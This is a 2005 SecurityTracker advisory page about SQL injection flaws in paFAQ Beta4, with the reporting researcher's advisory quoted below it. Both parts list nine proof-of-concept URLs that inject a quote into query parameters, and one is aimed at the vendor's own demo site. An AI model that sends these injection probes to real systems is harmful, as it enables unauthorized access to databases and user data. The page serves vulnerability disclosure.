SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   paFAQ Vendors:   PHP Arena
paFAQ Input Validation Holes Permit SQL Injection Attacks
SecurityTracker Alert ID:  1013232
SecurityTracker URL:  http://securitytracker.com/id/1013232
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 18 2005
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): Beta4
Description:   Several input validation vulnerabilities were reported in paFAQ. A remote user can inject SQL commands.

Several scripts do not properly validate user-supplied input in certain parameters. The 'question.php', 'answer.php', 'search.php', and 'comment.php' scripts are affected. A remote user can submit a specially crafted URL to execute arbitrary SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='
http://[target]/index.php?act=Question&id=1&orderby=q_id&order=DESC&limit='
http://[target]/index.php?act=Question&id=1&orderby=q_id&order='&limit=10
http://[target]/index.php?act=Question&id=1&orderby='&order=DESC&limit=10
http://[target]/index.php?act=Answer&cid=1&id=1&offset='
http://[target]/index.php?act=Search&code=01&search_item='
http://[target]/index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id='
http://[target]/index.php?act=Speak&code=02&cid='&id=1&poster=1&name=2&answer=3&email=4
http://[target]/index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4

Pi3cH of PersianHacker.NET Security Team reported this flaw.

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phparena.net/pafaq.php (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [PersianHacker.NET 200505-07] paFAQ Beta4 Sql Injection




[PersianHacker.NET 200505-07] paFAQ Beta4 Sql Injection
Date: 2005 February
Bug Number: 07

paFAQ
is a feature rich FAQ/Knowledge base system allowing webmasters to keep an organized database of Frequently Asked Questions. paFAQ
 also makes a great Knowledge Database for problems and solutions related to your scripts and programs. It runs using PHP and MySQL
 for speedy processing times.
More info @:
http://www.phparena.net/pafaq.php


Discussion:
--------------------
Sql Injection in 'question.php', 'answer.php', 'search.php', 'comment.php' that may allow a remote user to launch Sql injection attacks.
A form of attack on a database-driven Web site in which the attacker executes unauthorized SQL commands by taking advantage of insecure
 code on a system connected to the Internet, bypassing the firewall.

This vulnerability is reported to exist in paFAQ Beta4, other versions might
also be affected. 

Exploit:
--------------------
http://www.example.com/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='
http://www.example.com/index.php?act=Question&id=1&orderby=q_id&order=DESC&limit='
http://www.example.com/index.php?act=Question&id=1&orderby=q_id&order='&limit=10
http://www.example.com/index.php?act=Question&id=1&orderby='&order=DESC&limit=10
http://www.example.com/index.php?act=Answer&cid=1&id=1&offset='
http://www.example.com/index.php?act=Search&code=01&search_item='
http://www.example.com/index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id='
http://www.example.com/index.php?act=Speak&code=02&cid='&id=1&poster=1&name=2&answer=3&email=4
http://www.example.com/index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4


Example:
--------------------
@ authors website!
http://demo.phparena.net/pafaq/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='
-

Solution:
--------------------
in the code validate values with PHP patterns then process it.


Credit:
--------------------
Discovered by PersianHacker.NET Security Team
by Pi3cH (pi3ch persianhacker net)
http://www.PersianHacker.NET

Special Thanks: our security team users.


Help
--------------------
visit: http://www.PersianHacker.NET
or mail me @: pi3ch persianhacker net


Note
--------------------
Scripts authors were not be contacted for this bug.

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC